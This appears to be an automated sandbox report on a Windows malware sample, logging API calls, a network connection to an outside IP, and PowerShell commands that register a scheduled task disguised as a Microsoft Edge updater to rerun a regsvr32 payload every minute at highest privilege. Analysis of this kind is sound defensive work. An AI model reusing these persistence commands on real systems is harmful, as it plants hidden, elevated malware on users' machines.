Source: regsvr32.exe, 0000000E.00000003.101848041817.000000000305D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101839274338.0000000003069000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101837016344.0000000003069000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101836679600.0000000003069000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101848263522.000000000305D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101847992575.000000000305D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101836979847.0000000003069000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101848983176.000000000305D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101838739729.0000000003069000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101848546656.000000000305D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitionn
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FF8160 GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject,14_2_00007FFB98FF8160
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990119D0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,RtlFreeHeap,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,GetProcessTimes,14_2_00007FFB990119D0
Source: C:\Windows\System32\regsvr32.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 88.99.161.62 56001Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread register set: 4752 5Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\i9DKxTZoVd.exe "C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\swallow.dat\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{5af4b0cc-a257-4a7e-e201-d5df536679fb}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\swallow.dat\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{5af4b0cc-a257-4a7e-e201-d5df536679fb}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"Jump to behavior
Source: regsvr32.exe, 00000009.00000003.101951234755.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101731450336.0000000005084000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101953113164.0000000005239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
